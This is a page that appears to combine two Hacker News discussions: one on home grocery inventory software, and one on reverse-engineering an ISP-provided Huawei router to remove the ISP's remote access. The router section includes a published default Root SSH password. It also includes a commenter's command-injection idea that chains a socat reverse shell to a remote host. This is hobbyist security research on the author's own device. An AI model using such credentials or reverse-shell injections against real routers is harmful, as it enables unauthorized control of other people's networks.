Finally, data entry of expiration dates is going to be too cumbersome. A better approach would be to have some sort of statistical model that estimates the shelf life from the product descriptions, e.g. 2 years for canned goods. Less precise, but more manageable; it could show alerts like 'check how much longer this can of tuna has left', and if it still has a ways to go, you could enter the precise date only then.

fmajid(10000) 5 days ago [-]

I have a workflow for books that is quite efficient, using the Mac app Delicious Library and a Microvision RoV Bluetooth scanner supported by the app (sadly discontinued):

https://blog.majid.info/organizing-with-delicious-library/

Sadly I don't have anything that streamlined for groceries.

jahbrewski(10000) 7 days ago [-]

I love the idea of this, but in reality I can't imagine the time and energy required to scan and keep everything up-to-date is offset by the benefits. Perhaps a current user can prove me wrong?

fock(4333) 7 days ago [-]

Just buy some extra rolls of toilet paper!

bradgessler(2194) 7 days ago [-]

I've been doing this with https://www.thingybase.com/, my phone, and a wireless Brother label printer for the past few months. Once you get used to a workflow it's not that bad, and it's very handy when you are out and about and need to see what's in your deep freezer or in storage.

Edit: I noticed a few people have signed up and are kicking the tires. Please let me know what you'd like to see built for this thing and give feedback in this thread. At the top of my list are: (1) a phone app, (2) better onboarding, (3) more fields for quantity, units, custom, etc., (4) attaching photos to items, (5) messaging/chat/threads for each item so people can coordinate better on inventory, (6) one-click 'create a posting to sell an item on Craigslist/etc' for getting rid of a thing, and (7) a way of loaning items to friends and showing them what's available for loan.

nogabebop23(10000) 7 days ago [-]

This is a similar challenge to the widespread problem of tracking expenses for small businesses. None of the solutions involve manually hand-bombing all the data, so maybe there is another angle that could be tackled?

viraptor(1912) 7 days ago [-]

I guess you don't have to actually use all the features all the time. I'm doing some of this stuff using anylist, where I've got recipes / meal planning / shopping list, and it works pretty well. I don't care about keeping stock; instead, every time I make a full shopping list, I go to the kitchen and remove things I already have.

Other features could be useful though: the list of batteries could be nice. House tasks as well.

bproctor(10000) 7 days ago [-]

Agree, I love the idea and wanted to make this work for my home, but from personal experience I'd say most people would find this more trouble than it's worth.

I wrote something very similar to this a couple years ago for our household. It runs on a raspberry pi and uses a barcode scanner and when we go shopping we scan everything in and then scan things out as we use them. We live far away from town and shopping trips are rare, big all day events. It's easy to forget to scan things out and then things that don't have barcodes like vegetables are hard to track so we don't bother. Manually entering it all in and then remembering to remove it while cooking is too much trouble (we tried).

z3ncyberpunk(10000) 7 days ago [-]

Agreed. If there was some kind of tech like Amazon's 'just walk out' idea that could automate keeping track of everything, it would be great. But having to do this stuff manually kills it. It's the same problem I have with personal money managers; I have to manually import my bank transactions and then further manually categorize and label them (I've scripted some but can't do most) for it to properly work and give me good graphs and breakdowns.

Mike1232B(10000) 7 days ago [-]

I think this sort of inventory system combined with automatic updates (a la Amazon Go store style OCR embedded in smart fridges, etc) would go a long way. Have always thought this would be useful, but agreed the amount of energy required to manually update everything would be unsustainable.

skeletonjelly(4200) 7 days ago [-]

What about a feature where you scan your receipt and it prompts you for expiry for relevant items? (Dairy etc)

petronio(10000) 7 days ago [-]

For household usage I think it might be helpful to separate items into categories:

- Frequent use

- Infrequent use & stock needed

- Infrequent use & stock not needed

The first category I wouldn't worry about: you know how much you have stocked due to frequently using it, so just jot it down on a simple shopping list as you feel more stock is needed. Both short and long shelf life items can be placed here, you know when you need more sugar or toilet paper, or when something you use frequently might go bad soon.

The second category would be very good to put in a system like this, complete with expiration dates. These might be emergency supplies and medications, things that are easily forgotten about but shouldn't be lacking at any time. Keeping track and being notified of expiration dates would be pretty important.

The final category is personal choice. Since you don't need a stock of it, then it's non-essential. You could place it in a system like the second category, or you could just throw it on a shopping list when it's running out like the first.

sbuttgereit(2338) 7 days ago [-]

You've hit exactly the downfall.

I've always liked the idea of this sort of thing, but the benefits of using something like this almost never outweigh the costs as compared to just eyeballing the pantry and winging the meal planning on short timescales. The system starts to become the point of the effort rather than just a tool to better achieve household goals.

Unless you're dealing with a substantial household or some sort of communal living environment (lots of roommates, half-way house, dorm) or doing a lot of entertaining, the benefits vs. the effort just leave these things as interesting experiments.

And I do see value in experimenting this way. I am an implementation consultant for actual ERP systems and data entry compliance is a real problem in the corporate world, too. There tends to be benefits to the data entry problem there, but the benefits tend to accrue a few degrees of separation from where the entry work takes place... so those that do the work often don't understand the need or importance. So if you solve some of the data capture problem in a small, low risk household environment, you may be able to apply the lessons learned to larger business systems. For example the more you could capture the data 'in flight', like cameras capturing the information as you're putting recently bought groceries away or pulling them out to cook, do that well enough and now the benefits start to be larger in the home... but maybe you can see avenues to reduce the data entry burden in the warehouse, or the data entry processing desks, etc.

But on its own, using the same old data acquisition patterns as boring old corporate ERP, your better bet is probably just pen and paper.

wharfjumper(10000) 7 days ago [-]

Wow I'm so happy to have found this. Have you considered clubs, restaurants, cafes etc as a target market? If you wanted to start earning some revenue to host it I think there could be an opportunity more so than home users.

We had started down the track of building a basic version of this for our ski club using MS 'Power Apps'. Our basic process is:

1. Pre-season: estimate requirements based on previous years and do a few large orders with various suppliers for delivery to coincide with the annual food lift (we can't drive all the way to our club). Primarily this is meat and non-perishables such as tinned/packaged items, toiletries and cleaning products.

2. Every few days during the season: perform a stock take of what's on hand in the club. Send it to the catering officer.

3. The catering officer orders according to his/her assessment of requirements. Mainly this will be perishables such as fruit/veges, eggs, bread, milk, but later in the season it may include other items.

4. Items are delivered to a common stock room and carried up the mountain by club members. Items are checked off the order list provided by the catering officer and added to various storage areas (fridges/freezers, store room, kitchen pantry etc).

Based on a quick run through the demo system I think grocy will meet our requirements for managing consumables.

Additionally club members staying on a particular night are assigned duties by the lodge leader e.g. breakfast dishes, vegetable prep, cooking dinner. We may be able to use the 'Chores' function to help with that.

Personally for home use I would not use this because it would not be practical for our family.

Regarding an additional feature: I would recommend looking at Cozi, which we use as a shared family calendar and which is really valuable for us. I imagine it would be fairly trivial to add that feature to Grocy.

I'll let you know how we got on with the club. Thanks and hope that helps.

fyrabanks(10000) 7 days ago [-]

I mean no offense, but the consumer version (as OP linked) strikes me as FOSS's answer to the IoT Fridge, a wholly unnecessary device itself.

I'm all about freeing mental bandwidth, but if you can't remember whether or not you bought a piece of salmon yesterday, or if you can't be fussed to read the expiration date on a milk carton, adding 'extreme attention to minor details' and 'tedium' to the mix is not going to help.

The right idea here is optimizing restaurant workflows to minimize food waste/deal with seasonal availability/delivery schedules/etc./etc. Take that and slap a nice frontend + tier 1 tech support on top of that? Baby, you got a stew going.

Personally, as a pedant, I actually find this really useful for my current home situation. :| thanks

itisit(10000) 7 days ago [-]

I'm able to get on remarkably well with grocery shopping without the use of any technology. Feel blessed.

imabluedabbad(10000) 7 days ago [-]

Seriously, can all of this stuff please go away already?

state_less(10000) 6 days ago [-]

Me too. I want to express my deep gratitude to those who sustain myself and others. I show up at the grocery store and encounter a cornucopia of nourishing foods - how lucky am I. This is your time to shine farmers, truck drivers, food processors and grocery store workers. Thank you!

wdb(10000) 6 days ago [-]

These days you can't get much more than a few mandarins and a bottle of orange juice. I haven't had a home-cooked meal since last Saturday; I've only been eating takeaway, as the supermarkets are always empty. It's getting ridiculous here in the UK.

sedgjh23(10000) 6 days ago [-]

Same in my city in the US.

tucosan(4343) 7 days ago [-]

I have been contemplating building a solution based on an RPi with an infrared hand scanner and a touch display attached to our fridge.

Now, I use a combination of Todoist, IFTTT and Google Home. 'Hey Google, groceries, add Milk'. Done.

Perfect while cooking. No phone, scanner or any other input device needed.

davidwparker(4132) 7 days ago [-]

Our family does the same, but with Google Home + Google Keep. Shared Costco list, Amazon list, Home Depot list, and grocery list between me and my spouse. 'Hey Google, add Milk to the Shopping List.' 'Hey Google, add Eggs to the Costco List.' No need for third-party integrations, either.

stblack(10000) 7 days ago [-]

I'm wondering if something like this exists, at a larger scale.

For example, say five or six neighboring households decide to distribute the shopping chore. One person goes to the grocery store, or COSTCO, returning with staples for multiple households.

zebnyc(10000) 7 days ago [-]

Is this a scenario that you encounter often? I have heard of 'buy together' being common / widely used in some Asian countries but not so much in US metropolitan areas.

Disclaimer, my info is purely anecdotal.

yingw787(3944) 7 days ago [-]

This looks cool :) Don't want to be a Debbie Downer in a time of crisis but I feel like you could use Google Sheets + IFTTT in order to accomplish much of the same thing. Would be especially useful if you could auto-tie this into grocery delivery services like Instacart.

jka(4309) 7 days ago [-]

I think it'd be possible to build a client which would GET /objects/shoppinglist from the grocy API[0] to retrieve the shopping list items, which currently have the following schema:

  {
    id integer
    product_id integer
    note string
    amount number
    row_created_timestamp string
  }

Do you know if there are clients for Instacart (and/or other food delivery services) available?

[0] - https://demo.grocy.info/api
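
A minimal sketch of such a client (assuming grocy's GROCY-API-KEY header auth and an instance base URL; error handling kept to a bare minimum):

  interface ShoppingListItem {
    id: number;
    product_id: number;
    note: string;
    amount: number;
    row_created_timestamp: string;
  }

  // GET /api/objects/shoppinglist from a grocy instance.
  async function fetchShoppingList(baseUrl: string, apiKey: string): Promise<ShoppingListItem[]> {
    const res = await fetch(`${baseUrl}/api/objects/shoppinglist`, {
      headers: { 'GROCY-API-KEY': apiKey },
    });
    if (!res.ok) throw new Error(`grocy API error: ${res.status}`);
    return res.json() as Promise<ShoppingListItem[]>;
  }

A delivery-service integration would then presumably map each product_id onto the vendor's catalog, which is where a client for Instacart or similar would come in.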

a_band(4235) 7 days ago [-]

Who wants this? People who ask themselves, 'Y'know, if I only had an ERP system to manage my refrigerator and batteries'? This seems very poorly conceived.

bdcravens(1046) 7 days ago [-]

I think pretty much every developer has tedious tasks in their life that they 'just know' they could improve via an app. Meal planning, kid's chores, financial budgets, you name it - many have considered for 2 seconds building their own. Most of us don't have time. Needless to say, I think this is infinitely more valuable than another meme generator.

detaro(2067) 7 days ago [-]

Poorly conceived because ... such people don't exist? The majority of people don't need it? ...?

ron22(10000) 7 days ago [-]

Very cool. What information is automatically imported to your list when scanning a barcode? Is it just the name of the product?

six2seven(10000) 7 days ago [-]

This is exactly what I needed, and I was thinking about building a similar app. But to be really useful and automated, there's a long way to go, I'm afraid. The biggest deal breaker is the time spent on data entry and updates, leaving a pen-and-paper / notes solution still the easiest to use, combined with just visiting local groceries and shops. I was collecting receipts and playing a bit with scanning them, but the amount of noise in the data and the inconsistencies between shops were a bit off-putting (unless you want to dedicate time to cleaning the data and training your own tailored information extraction models).

Some of the options to solve the data entry could be:

- good-quality automatic scanning of receipts (not only individual barcodes) from shops using OCR, possibly supported with image recognition for double-checking (it can happen that products are mislabelled or missing quantities, etc.)

- when ordering online, the receipt should be available, so it should also be much easier

Yet one will not always have a meaningful receipt available...

With data entry solved and the ability to predict one's supply needs, it would also be great to have up-to-date management of the inventory. There are even more challenges in tracking the available goods at home: where they are, how many items there are, and in what state (expiration date, etc.). That would most probably require implementing different IoT solutions (connected cameras, sensors, etc.).

Then, having a connected home with your grocery supplies under control, you can automate the shopping process further by feeding information about your demand back to the online groceries you are subscribed to. This can enable customer subscription plans and, for retailers, a possible continuous flow of goods. This could be really useful, especially in the upcoming months, when it seems like we are expected to spend a bit more time at home than usual, hopefully not fighting in the local shops for the last rolls of the new white paper gold.

hackme1234(4215) 6 days ago [-]

Agree. This is good for hobbyists but a pen and paper solution is so much simpler.

NamTaf(4318) 7 days ago [-]

Absolutely agree with everything you've said. I had dreamed of a Libib[1] for my kitchen, but knew I would have to do all the painful data adding and it was too much of a bother.

The other big challenge I never resolved was how you'd account for e.g. using 1/4 cup of flour out of a bigger volume. Or taken to its extreme, cooking oil. How do you know how much your 'splash' is? You can't predict the remaining volume without a lot of fiddling to measure it and that defeats the purpose.

In the end, I opted for manual databases too, but they're a pain to keep up-to-date. I still think there's a lot of value in a database for all-or-nothing style ingredients, but it was enough to deter me. I'm glad someone is less lazy.

[1]: https://www.libib.com/

starpilot(1590) 7 days ago [-]

With image recognition, I think the dream might be: take a picture of your shopping cart or basket, and recognize any product that is no more than 50% occluded. Put a red square around any item not recognized, and let the user pick it up and rotate it until it's recognized.

toss1(4314) 7 days ago [-]

Just discovered a potential workaround with one vendor.

It turns out that with an Amazon Prime account and shopping at Whole Foods, the entire history is available down to the SKU, quantity, and date. I discovered this when going to order a delivery for the first time in the COVID-19 outbreak: aside from the generic shopping selection, we can also pick from our own previous purchases.

I haven't checked if there are other methods to access the data (e.g., with the app, or some history list), but there's the potential for at least some screen-scraping, and maybe they'll make the history available in a downloadable file if we pester them? It'd certainly help both this app and making their stores a bit 'stickier'.

MidgetGourde(10000) 7 days ago [-]

Me too, I was thinking about creating a simple web app for myself, purely from the view of food wastage. I live alone and it's sometimes pretty difficult to plan meals when some food packs don't last. Freezable things are OK, but sometimes the salad goes in the bin. Tracking these things avoids purchasing unnecessary items from the shop. Will check this out.

jka(4309) 7 days ago [-]

If you were going to tackle the ingredient data-entry problem, what would your preferred system design be?

On the other end of the system, I'm hoping to implement a way to bulk load recipes into grocy, using the open source recipe-scrapers[0] library.

[0] - https://github.com/hhursev/recipe-scrapers

huffmsa(10000) 7 days ago [-]

Sounds like you stole my notebook on this subject.

homarp(581) 7 days ago [-]

There is https://github.com/Forceu/barcodebuddy, which integrates with grocy: 'If already in Grocys system, it will consume/add/open the product in Grocy. If an unknown barcode is passed, the product name will be looked up and a corresponding product can be chosen in the Web UI. Tags can be saved - if a new product contains the tag in the name, the product will be already preselected in the drop-down list.'

zebnyc(10000) 7 days ago [-]

I would imagine that all this tracking & automation would have to address security/privacy concerns.

Also, costs would simply explode, making the whole solution a non-starter for a lot of households.

cheez(10000) 7 days ago [-]

I would be OK if we can take a receipt, or an order email, dump it into the system and it takes best guesses. For automation, at least.

chipperyman573(4050) 7 days ago [-]

If you shop at Walmart, there is an option to add a receipt to your account by scanning the barcode in the app (or it shows up by itself when you use Walmart Pay). These can be retrieved online from anywhere (not just the app), which is how I do it; it's way easier than you think. It basically comes down to

  $('.icon-button-children').each((index, item) => ($(item).click())) // expand all items

  $('.LinesEllipsis ').each((index, item) => console.log(item.innerText)) // record the stuff

on https://www.walmart.com/account

bauerd(10000) 7 days ago [-]

Re data entry: was thinking this through a lot recently. Basically what I'd like to build requires either (1) product recognition vision like Google Lens offers, or (2) a barcode scanner and an extensive barcode product database. Both can be combined of course.

My solution would be to read frames from a smartphone's camera until a barcode is detected. This can be achieved with eg Firebase ML, on-device. If a barcode database lookup gives a product, put it on the in/out list. If not, send the frame to a product recognition vision service. This could be Google Cloud Vision AI, but they don't give you access to their product set that backs Google Lens.

Finally, provide controls to adjust the number of items on the in/out list

I thought about OCRing supermarket receipts too, but these differ so greatly in layout etc. per country that I figured it's not the way to go.

Edit: The problem you run into, as not all of this can be done on-device, is privacy concerns of course. Just my thoughts on what interface I'd like to have.
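
For the barcode half, there is also the experimental Shape Detection API in some Chromium browsers, which avoids a cloud round-trip entirely; a sketch assuming a browser that ships BarcodeDetector:

  // Scan camera frames until an EAN-13/UPC-A barcode is found.
  // BarcodeDetector is experimental and Chromium-only at the time of writing,
  // hence the local declaration.
  declare class BarcodeDetector {
    constructor(options?: { formats: string[] });
    detect(source: CanvasImageSource): Promise<Array<{ rawValue: string }>>;
  }

  async function scanUntilBarcode(video: HTMLVideoElement): Promise<string> {
    const detector = new BarcodeDetector({ formats: ['ean_13', 'upc_a'] });
    video.srcObject = await navigator.mediaDevices.getUserMedia({
      video: { facingMode: 'environment' },
    });
    await video.play();
    while (true) {
      const codes = await detector.detect(video);
      if (codes.length > 0) return codes[0].rawValue;            // first hit wins
      await new Promise((r) => requestAnimationFrame(r));        // try again next frame
    }
  }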

cheschire(10000) 7 days ago [-]

I imagine a future evolution of this could be embedding it on a raspi with a USB barcode scanner, and putting a control screen in your pantry.

knicholes(10000) 7 days ago [-]

You can read barcodes with your phone camera. No additional hardware required.

dakial1(4315) 7 days ago [-]

The main challenge (as others pointed out) is in the data entry (and updates). I see the options as:

Grocery Input (easiest):

- Receipt Scanning and OCR - Easiest, as people don't change supermarkets and groceries too often, so once an item on the receipt is identified it will always be recognized.

- Bar Code Scanning - Also possible but too much work to scan each item, and some items don't have a code.

- Visual Recognition - Video Camera or periodic photos of the grocery storage, hard to do.

- RFID tags and portals - I dream that one day barcodes will be replaced by RFID tags; then it would be feasible to have a portal wherever you keep your groceries.

- API - If any supermarket offers that sort of thing for receipt data

Grocery Update/Usage (Hardest):

- Recipe usage - By the estimated usage of every recipe you make (like Grocy tries to do), but that doesn't cover everything that is not on recipes (like cleaning products)

- Visual Recognition - The same as above, if it can recognize groceries going in, it can recognize groceries going out

- RFID tags and Portals - The same dream as above

- ML - By the frequency of your product purchases, a machine learning model might be able to predict when you should buy a new item (a toy sketch follows this list).
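
On that last point, even something far short of real ML already gives a useful signal; a toy sketch that predicts the next purchase date from the mean gap between past purchases (illustrative only):

  // Estimate when a product will next be needed from its purchase history.
  function predictNextPurchase(purchaseDates: Date[]): Date | null {
    if (purchaseDates.length < 2) return null; // not enough history
    const sorted = [...purchaseDates].sort((a, b) => a.getTime() - b.getTime());
    const gaps: number[] = [];
    for (let i = 1; i < sorted.length; i++) {
      gaps.push(sorted[i].getTime() - sorted[i - 1].getTime());
    }
    const meanGap = gaps.reduce((sum, g) => sum + g, 0) / gaps.length;
    return new Date(sorted[sorted.length - 1].getTime() + meanGap);
  }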

ehsankia(10000) 7 days ago [-]

All these solutions only solve one half of the problem, which is input. But there's also the other half, which is marking items as you use them. Yet another part which also needs to be considered is the separate input for expiration tracking. The latter may be solvable if you approximate shelf lives for each product in a database and assume that the product you bought starts at 0.

But yeah, even if you can simplify the first part as your post describes, there's still a lot more work to maintain the data beyond that.

danzig13(10000) 7 days ago [-]

Do not make the same mistake as regular ERP. If APIs are available, try to integrate with sources of data people actually use vs. direct user input.

danzig13(10000) 7 days ago [-]

Kroger has an API for some things:

https://developer.kroger.com/reference/





Historical Discussions: A detailed look at the router provided by my ISP (March 25, 2020: 589 points)

(594) A detailed look at the router provided by my ISP

594 points 3 days ago by paddlesteamer in 10000th position

0x90.psaux.io | Estimated reading time – 7 minutes | comments | anchor

I have been living in my current apartment for more than a year now, and I noticed I have never inspected the router my ISP provided when I moved in. The only thing I changed on the router was the default login password (admin/password) for the web interface. So I decided to take a more detailed look.

It is a Huawei HG253s router and is widely used by Turkcell Superonline customers, since it comes with the internet plan. Actually, Turkcell Superonline enforces the use of these modems by not allowing devices whose MAC addresses differ from those of the pre-registered Huawei routers. It is possible to do MAC cloning with another router, but you still need to buy one of these pre-registered Huawei routers to learn a legit MAC address.

The first thing I did was initiate a fast nmap scan on the router to see if there is an open ssh or telnet port.

  $ nmap -F 192.168.1.1
  Starting Nmap 7.80 ( https://nmap.org )
  Nmap scan report for 192.168.1.1
  Host is up (0.0018s latency).
  Not shown: 95 filtered ports
  PORT    STATE SERVICE
  21/tcp  open  ftp
  22/tcp  open  ssh
  80/tcp  open  http
  443/tcp open  https
  631/tcp open  ipp

  Nmap done: 1 IP address (1 host up) scanned in 7.24 seconds

We can see that there is an ssh port open. So let's try to connect with the admin user:

  $ ssh admin@192.168.1.1
  Unable to negotiate with 192.168.1.1 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

This is an unexpected response. The router offers the legacy diffie-hellman-group1-sha1 key exchange method. According to this openssh page:

OpenSSH supports this method, but does not enable it by default because it is weak and within theoretical range of the so-called Logjam attack.

But we can enable it with the KexAlgorithms option. So let's try again:

  $ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@192.168.1.1
  Unable to negotiate with 192.168.1.1 port 22: no matching cipher found. Their offer: 3des-cbc

Again another legacy offer. Let's enable the cipher and connect again:

  $ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+3des-cbc admin@192.168.1.1
  admin@192.168.1.1's password:

Now it asks for a password, but what is it? I tried the default password (superonline) and the password I set for the web interface, with no luck. After a little searching on the internet, I found out there is another user called Root (surprise!) whose default password is R8Ibq_2K15Gna for my firmware version HG253sC01B039. One more time, then:

  $ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+3des-cbc Root@192.168.1.1
  Root@192.168.1.1's password:
  PTY allocation request failed on channel 0
  -------------------------------
  -----Welcome to ATP Cli------
  -------------------------------
  ATP>

It worked, but I don't know what ATP Cli is. Again, a little searching on the internet reveals it is some kind of control/test interface that should respond to some commands. I tried some commands, but only help returned a response.

  ATP>shell
  shell
  ATP>sh
  sh
  ATP>whoami
  whoami
  ATP>date
  date
  ATP>help
  help
  Welcome to ATP command line tool.
  If any question, please input '?' at the end of command.

  ATP>

We know it is responsive since it returned a response to the help command, but it is obviously highly restricted. I tried to find my version of the firmware (which is the latest one, by the way) to get my hands on this ATP Cli binary, but it turned out that neither Huawei nor Turkcell Superonline has published any version of the firmware. This is very unusual. There should be an upgrade mechanism, since I know there are routers running older firmware. So I decided to sniff my router's network.

In order to achieve this, I gathered two USB-Ethernet converters and my Debian laptop. I will use bridge-utils and a network sniffer's favorite tool: Wireshark. To create a bridge, run:

  brctl addbr br0

Then bond interfaces to the bridge:

  brctl addif br0 eth0 eth1

Disable multicast snooping

  echo 0 > /sys/devices/virtual/net/br0/bridge/multicast_snooping

And run Wireshark on eth0 or eth1. Note that both interfaces are in promiscuous mode.

Interesting! After initializing the PPPoE session, we can see a DNS query made for acs.superonline.net and a TLS connection made to that IP address. Due to the nature of TLS connections, it isn't possible to see the content of the communication, but we can assume the router uses the TR-069 protocol, since ACS most probably stands for Auto Configuration Server, which is an element of that specification. And better than that, it is probably used to upgrade the firmware, so we may be able to sniff an update over the air.

This is the end of the first part. In the next part, I'll try to sniff the communication between acs.superonline.net and my router, and also modify it if applicable/necessary.




All Comments: [-] | anchor

1_player(3923) 2 days ago [-]

Very interesting article.

What about that precompiled .ssh/authorized_keys with user [email protected] mentioned in Part 3?

Any reason why a router firmware would permit root access to anyone at all? Definitely sounds like a backdoor to me.

skoskie(10000) 2 days ago [-]

That was the worst part. I would have that bombshell as the lede. And then delete it if possible.

j_h(10000) 2 days ago [-]

EU net neutrality regulation grants end users right to use their own equipment.

https://fsfe.org/activities/routers/

Someone1234(4336) 2 days ago [-]

Turkey isn't in the EU.

mercora(4290) 2 days ago [-]

Note that only Germany, Italy and the Netherlands have this regulation enforced. They even link to a [0] page with the progress of that campaign.

[0] https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F...

non-entity(3552) 2 days ago [-]

A while back, I was playing around with the cable modem / router the ISP gave me, because I was curious and an idiot. After screwing around a bit, I managed to find a vulnerability that exposed technician credentials in plaintext, and they actually worked. I had no idea where to report it though, because the manufacturer's contact page could be summed up as 'fuck you, we don't talk directly to consumers'. I don't think the vulnerability was that bad, as you had to be logged in to the web interface already with another account, but still.

I don't really trust ISP provided hardware / software now though.

Bartweiss(10000) 2 days ago [-]

> you had to be logged in to the web interface already with another account

Obviously I don't know the specifics, but if this applies to any router which has multiple tiers of login, then it could be a pretty serious problem. I suspect that might be true for routers designed specifically to broadcast multiple networks (e.g. school or shared apartment-building routers)?

praptak(2737) 2 days ago [-]

The right thing to do in such circumstances is to publish the vulnerability.

steerablesafe(10000) 2 days ago [-]

You never know. The same technician credentials could potentially work on many routers from the same ISP, maybe even through WAN.

mercora(4290) 2 days ago [-]

It looks like this CLI has some hardcoded shell commands with variable substitutions that look possibly unprotected against command injection.

For example

  iptables %s > %s 2>&1
could probably be executed as

  iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
by issuing

  iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
and therefore it might be possible to get real shell access too.

paddlesteamer(10000) 1 day ago [-]

Hello, OP here. I've actually spent a considerable amount of time trying to find a code execution. I know you'll want to learn the details of FUN_004122c0, but here is the decompiled version of the iptables part from Ghidra:

undefined4 FUN_004045a0(int param_1,int param_2)
{
  int iVar1;
  int iVar2;
  char *pcVar3;
  char cVar4;
  code *pcVar5;
  undefined auStack544 [256];
  undefined auStack288 [260];

  FUN_00412530(auStack544,0,0x100);
  FUN_00412530(auStack288,0,0x100);
  if (param_1 == 0) {
    FUN_004122c0(auStack288,0x100,'iptables > %s 2>&1','/var/IptablesInfo');
  }
  else {
    iVar1 = FUN_00412210(0x100);
    if (iVar1 == 0) {
      return 0x40010009;
    }
    cVar4 = '\0';
    while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
      if (cVar4 == '\0') {
        FUN_004122c0(iVar1,0x100,0x412c84,iVar2);
      }
      else {
        FUN_004122c0(iVar1,0x100,'%s %s',iVar1,iVar2);
      }
      cVar4 = cVar4 + '\x01';
      param_2 = param_2 + 1;
    }
    FUN_004122c0(auStack288,0x100,'iptables %s > %s 2>&1',iVar1,'/var/IptablesInfo');
    FUN_00412660(iVar1);
  }
  FUN_00412330(auStack288);
  iVar1 = FUN_004123c0('/var/IptablesInfo',0x414f68);
  if (iVar1 == 0) {
    pcVar5 = FUN_004126e0;
    pcVar3 = 'Fail\r';
  }
  else {
    while (iVar2 = FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {
      FUN_004126b0(0x412c84,auStack544);
      FUN_004121a0(0xd);
    }
    FUN_00412520(DAT_0042b010);
    FUN_004123a0(iVar1);
    pcVar5 = FUN_00412500;
    pcVar3 = '/var/IptablesInfo';
  }
  (*pcVar5)(pcVar3);
  return 0;
}

Any ideas?

Faaak(10000) 2 days ago [-]

Depends on whether they `execve` or run the command inside a shell.

I'd bet on `execve`, but who knows.

blakesterz(4311) 2 days ago [-]

Interesting read! There's actually 3 parts to this:

Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already...

And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already...

Summary from the end of Part 3:

'So we managed to change passwords for both ssh and telnet, gain access to Root user for the web interface, changed that password too. We changed ACS URL to ours and remove the IP restrictions. To put it simply, we cleaned up our router from our ISP. Good for our privacy.'

sheep-a(10000) 2 days ago [-]

You forgot this bit of the summary, which I think is more interesting!

'Still there is an authorized ssh key left in the firmware but for now it's enough that we're keeping the ISP out. Maybe in the future, we can repack the firmware with our configuration and keys and install it on the router. For now, take care!'

fireattack(10000) 1 day ago [-]

The navigation arrows in the top right corner seem to be backwards. 'Next' goes from 2 to 1, instead of 3.

fulafel(3340) 2 days ago [-]

Trivia: Strictly speaking a box that does NAT is not a router in the IP protocol sense, it's a kind of proxy. The router requirements RFC explicitly forbids altering most fields (incl the address field) in the IP header.

icedchai(4288) 2 days ago [-]

...an RFC that was written in 1995, before NAT was really necessary.

My view: If it forwards IP between different networks, it's a router.

packet_nerd(10000) 2 days ago [-]

The box in people's homes colloquially known as a router actually commonly combines a lot of functions into one:

* router

* firewall

* NAT device

* modem

* switch

* access point

* DNS resolver

* DHCP server

And probably others I'm not thinking of :-)

iso1631(10000) 2 days ago [-]

I have a box that runs various routing protocols including OSPF and BGP, but also does NAT where it needs to. It's known as a 'router'.

c0nsumer(4116) 2 days ago [-]

Very true. Yet at the same time, it does route traffic to the appropriate boxes. And the name 'router', when referring to something someone has at their house, has entered the vernacular to mean 'the box at home which lets me share the internet connection across all my computers'.

Most folks have no idea how it works behind the scenes, which typically is a combination of NAT (IPv4), routing (IPv6), DHCP, DNS, UPnP, and more. So, it's just 'the router'.

zamadatix(10000) 2 days ago [-]

The NAT RFCs came after the routing RFC and refer to NAT as a router function, not as an orthogonal function; boxes that do NAT are referred to as routers in the RFCs. This is reflected in the real world, where NAT is implemented as part of the routing chain, not as a separate module. Remember, NAT isn't a box creating 2 sockets and ferrying data between them; it is just the translation of fields on top of normal routing functionality.

gerdesj(10000) 2 days ago [-]

RFC 1812 does allow that the internet was changing rather fast back in 1995 and accepts it probably won't be the final word: https://tools.ietf.org/html/rfc1812#section-1.3.1

tssva(10000) 2 days ago [-]

Trivia: Strictly speaking a box that does NAT is not a kind of proxy. Proxies act as the destination end point of one connection, establish a separate connection to another endpoint and forward data between the two separate connections. A NAT device changes IP header information such as the address field and if also doing PAT the port field but doesn't act as the source or destination for connections.

mafuy(10000) 2 days ago [-]

Many people here pointed out a problem: Removing access for the ISP and/or device manufacturer means they cannot fix bugs remotely and automatically. This is bad in situations like when the Mirai malware hit.

How about this?: 'You can use your own device and we provide all required information, but there will be no advanced support and you have to check for bugfixes yourself monthly.'

... now that I wrote it, I see the answer: There is no way to enforce this, especially not reliably.

marcosdumay(10000) 2 days ago [-]

Ok, from the Wikipedia:

> Mirai then identifies vulnerable IoT devices using a table of more than 60 common factory default usernames and passwords

Taking control of the device is exactly the kind of thing that stops that attack.

davedx(1829) 2 days ago [-]

Fantastic write up from a hacking point of view. I did wonder about this statement though:

'This is very invasive and unacceptable. It may seem necessary to apply security patches published by your ISP but the user should be able to disable it whenever she wants.'

Legally, at least in countries where I've lived, the ISP still owns the router. This surprised me a bit when I first found out, but then I got used to the idea: you should treat any ISP or telecom gear in your house as something that's 'rented but still owned and controlled by someone else'.

yjftsjthsd-h(10000) 2 days ago [-]

And that is why I have my own router plugged into the ISP router:)

blacksmith_tb(10000) 2 days ago [-]

True, but I think it's worth comparing it to other utilities in your home - what if your electric company could make all your lightbulbs 20% dimmer without notice? Or if your water heater was remotely administered? ISPs, like mobile telcos, like to claim they must have control over your hardware 'for security' but I think the most charitable interpretation is that it's to make their customer service dept. sweat less (more nefarious possibilities exist, of course).

AdmiralAsshat(1444) 2 days ago [-]

I never thought to nmap my own router until reading this.

  PORT      STATE SERVICE
  53/tcp    open  domain
  80/tcp    open  http
  631/tcp   open  ipp
  5000/tcp  open  upnp
  7777/tcp  open  cbt
  20005/tcp open  btx

Now begins the three-hours-and-counting rabbit hole of trying to figure out what the hell is running on ports 7777 and 20005. Or why UPnP is apparently running, despite UPnP being explicitly disabled on the Netgear router's admin page.
manifoldgeo(10000) 1 day ago [-]

